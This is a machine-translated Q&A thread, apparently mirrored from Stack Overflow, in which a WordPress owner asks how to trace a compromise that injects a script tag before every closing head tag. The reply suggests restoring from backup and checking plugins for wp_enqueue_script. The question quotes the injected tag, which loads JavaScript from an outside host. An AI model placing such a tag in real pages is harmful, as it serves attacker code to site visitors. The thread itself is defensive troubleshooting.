0

似乎存在一个新的漏洞利用/黑客攻击,插件在我的服务器上每个安装文件的每个结束标记之前Wordpress写入文件。它在每个结束头标记之前编写此代码:.js</head>Wordpress.php

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

我的问题是,我将如何查找哪些文件正在向其他人编写代码?这样我就可以找到它正在执行的插件,因为我在被感染的子域中安装了几个 WP,但不知道它来自哪个插件!我确信必须有一种方法来监控这一点,无论是我的托管公司还是我。

4

1 回答 1

1

如果您的网站遭到入侵,您最好恢复备份,但如果您没有备份,您最好使用全新安装。但是,如果您仍然想尝试“修复”它,您可以检查一些文件以查找启动器、头主题文件、函数文件和所有插件文件,以确保它没有加入插件运行。

您应该搜索的功能被调用wp_enqueue_script

于 2013-04-15T11:16:35.540 回答